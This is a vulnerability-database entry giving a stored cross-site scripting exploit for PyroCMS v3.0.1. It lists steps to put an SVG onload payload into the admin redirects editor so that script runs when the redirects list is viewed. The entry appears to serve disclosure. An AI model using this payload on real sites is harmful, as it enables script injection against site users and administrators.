Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtTmrswrr1337DAY-ID-39609
HistoryMay 13, 2024 - 12:00 a.m.

PyroCMS v3.0.1 - Stored XSS Vulnerability

2024-05-1300:00:00
tmrswrr
0day.today
17
pyrocms
stored xss
vulnerability
admin panel
redirects
webapps

7.4 High

AI Score

Confidence

Low

JSON
# Exploit Title: PyroCMS v3.0.1  - Stored XSS
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://pyrocms.com/
# Version: v3.0.1
# Tested on: https://www.softaculous.com/apps/cms/PyroCMS



----------------------------------------------------------------------------------------------------


1-Login admin panel , go to this url : https://127.0.0.1/public/admin/redirects/edit/1
2-Write in Redirect From field your payload : <sVg/onLy=1 onLoaD=confirm(1)//
3-Save it and go to this url : https://127.0.0.1/public/admin/redirects
4-You will be see alert button

7.4 High

AI Score

Confidence

Low

JSON